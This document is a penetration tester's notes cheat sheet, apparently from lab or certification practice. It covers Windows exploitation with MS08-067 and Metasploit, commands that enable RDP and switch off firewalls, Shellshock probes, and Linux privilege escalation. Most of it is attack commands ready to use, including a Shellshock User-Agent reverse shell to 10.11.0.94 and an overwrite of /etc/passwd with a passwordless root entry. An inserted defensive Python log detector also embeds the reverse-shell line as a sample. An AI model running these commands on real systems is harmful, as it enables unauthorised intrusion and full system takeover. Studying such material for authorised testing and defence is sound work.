# Notes

If the ms08-067 exploit is present but exploitation fails or an encoding error occurs, change the payload. Use smaller payloads, such as windows/shell\_reverse\_tcp, and do not use meterpreter. If the payload is too large, metasploit returns the error "Exploit failed: No encoders encoded the buffer successfully."

**If the administrator account is disabled, the STATUS\_USER\_SESSION\_DELETED error is returned.**

## Enable RDP

```
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
```

If the user does not exist:

ERROR: Failed to open connection - NT\_STATUS\_LOGON\_FAILURE

If the user exists but lacks the required privileges, the ERROR is:

Cannot connect to svcctl pipe. NT\_STATUS\_ACCESS\_DENIED.

For the exploit to succeed, it needs access to the IPC$ share.

"You just need access to the IPC$ share, not a named pipe."

### Disable Firewall

```
XP:
netsh firewall set opmode mode=DISABLE

New Windows Ver:
netsh advfirewall set allprofiles state off
```

### Compile C code to exe in Linux

```
i686-w64-mingw32-gcc 646.c -lws2_32 -o 646.exe
```

### ShellShock

```
env x='() { :;}; echo vulnerable' bash -c "ps aux"
env x='() { :;}; /usr/bin/id' /bin/bash -c "/usr/bin/id"
/usr/bin/env x='() { :;}; /usr/bin/id' /bin/bash -c "ps aux"
```

Find writable files for user: `find / -writable -type f 2>/dev/null | grep -v ^/proc`

Find files with the setuid bit set: `/bin/find / -perm -4001 -type f 2>/dev/null`

### shellshock

```
User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/10.11.0.94/1234 0>&1
```
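Added example (not part of the original notes): a defender-side Python check that flags Shellshock attempts in a web server access log by matching the Bash function-definition prefix `() {` in the Referer and User-Agent fields. The log lines and IP addresses are constructed samples.

```python
import re
from typing import Dict, List

# Shellshock payloads begin with a Bash function definition "() {" placed in
# any field the web server exports to CGI (User-Agent, Referer, Cookie, ...).
# Matching on that prefix catches the pattern whatever command follows it.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Constructed sample access-log lines in combined log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2014:13:55:36 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -i >& /dev/tcp/10.0.0.5/1234 0>&1"
10.0.0.6 - - [10/Oct/2014:13:55:40 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.7 - - [10/Oct/2014:13:56:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 77 "() { :; }; echo vulnerable" "curl/7.38.0"
"""

# Combined log format: ip ident user [ts] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def find_shellshock(log_text: str) -> List[Dict[str, str]]:
    """Return one record per log line whose Referer or User-Agent carries a
    Bash function-definition prefix. Lines that do not parse are skipped."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("referer", "ua"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append({"ip": m.group("ip"), "field": field,
                             "request": m.group("request"),
                             "value": m.group(field)})
                break  # one record per line is enough for alerting
    return hits


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['field']}: {hit['value']}")
```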

### Add directory to PATH

```
export PATH=$PATH:/usr/bin/
```

### Samba version

```
msf > use auxiliary/scanner/smb/smb_version
```

### 64 Bit c and c++ compile in Linux

```
# C
i686-w64-mingw32-gcc hello.c -o hello32.exe      # 32-bit
x86_64-w64-mingw32-gcc hello.c -o hello64.exe    # 64-bit
 
# C++
i686-w64-mingw32-g++ hello.cc -o hello32.exe     # 32-bit
x86_64-w64-mingw32-g++ hello.cc -o hello64.exe   # 64-bit
```

### ssh user enumeration

```
for user in $(cat users.txt); do python sshuserenum.py --username $user IP; done
```

### udev 2.6

[udev exploit tutorial](https://blackwintersecurity.com/tutorials/)

### If /etc/passwd is writable

```
$ echo root::0:0:root:/root:/bin/bash > /etc/passwd
```

then:

```
su
```

root is gained!

### writable file and directory

```
find / -writable -type d 2>/dev/null
find / -writable -type f 2>/dev/null
```
